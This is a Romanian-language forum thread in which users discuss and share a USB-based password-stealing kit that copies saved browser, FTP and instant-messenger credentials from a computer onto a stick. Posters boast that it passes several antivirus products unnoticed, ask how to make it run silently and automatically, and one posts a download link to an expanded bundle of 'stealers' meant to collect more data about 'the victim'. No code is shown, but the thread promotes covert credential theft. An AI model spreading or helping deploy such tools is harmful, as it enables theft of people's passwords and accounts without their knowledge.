Jump to content
Gonzalez

Inregistreaza pe USB toate parolele dintr-un sistem.

Recommended Posts

Posted

Nu ar fi mult mai simplu si mult mai eficient folosirea programului USB Thief....l-am testat cu KIS 2010, Avira, ESET si nimic... a furat chiar si o parola din IE8 de logare pe un ftp dar avea bifata optiune de remember....

Posted
da imi plaace..lam creat deja pe stick am incercat pe pc-ul meu doar ca pt firefox imi apare o eroare de genu: " Failed to find the singons file of Firefox " cei de facut? sau din ce cauza...

Probabil e versiunea 3.5 , în cazul acesta nu garantez ca func?ioneaz? ceva.

Posted

super tare. merci cla1992

@ YuliK - nu ar fi mai fain daca tu ai posta alte programele in ALTE sectiuni ? scrie cumva aici "Inregistreaza toate parolele dintr-un sistem + alte programe de gen" ? deschide baiete un topic si lumineaza-ne!

Posted

crezi ca se poate face ca sa ruleze automat si fara sa se mai deschida vreo fereastra?

de mers merge f bine insa trebuie sa iti salvezi fiserele txt daca vrei s a il folosesti iar pentru ca le rescrie pe cele vechi si pierzi parolele

Posted

Foarte tare...

La mine a functionat , l-am incercat pe PC-ul meu, cu exceptia messenger-ului, acolo textul imi e gol. Nu e nici o parola. Oare pentru ca folosesesc messenger 9 ???

Oricum, merci pentru tutorial...

Posted

Downloadati acest fisier ca este mult mai complet si ofera mai multe date despre victima. L-am luat de pe hellsoft si am mai adaugat din alta parte unele stealere si am modificat in fisierul batch ca sa poata sa ruleze , sper ca va vor ajuta mult mai mult...bafta.

Link: FileShare Download USB hack Mai complet.rar

Daca mai aveti si voi puteti completa sa avem in final date cat mai multe despre calculatorul victimei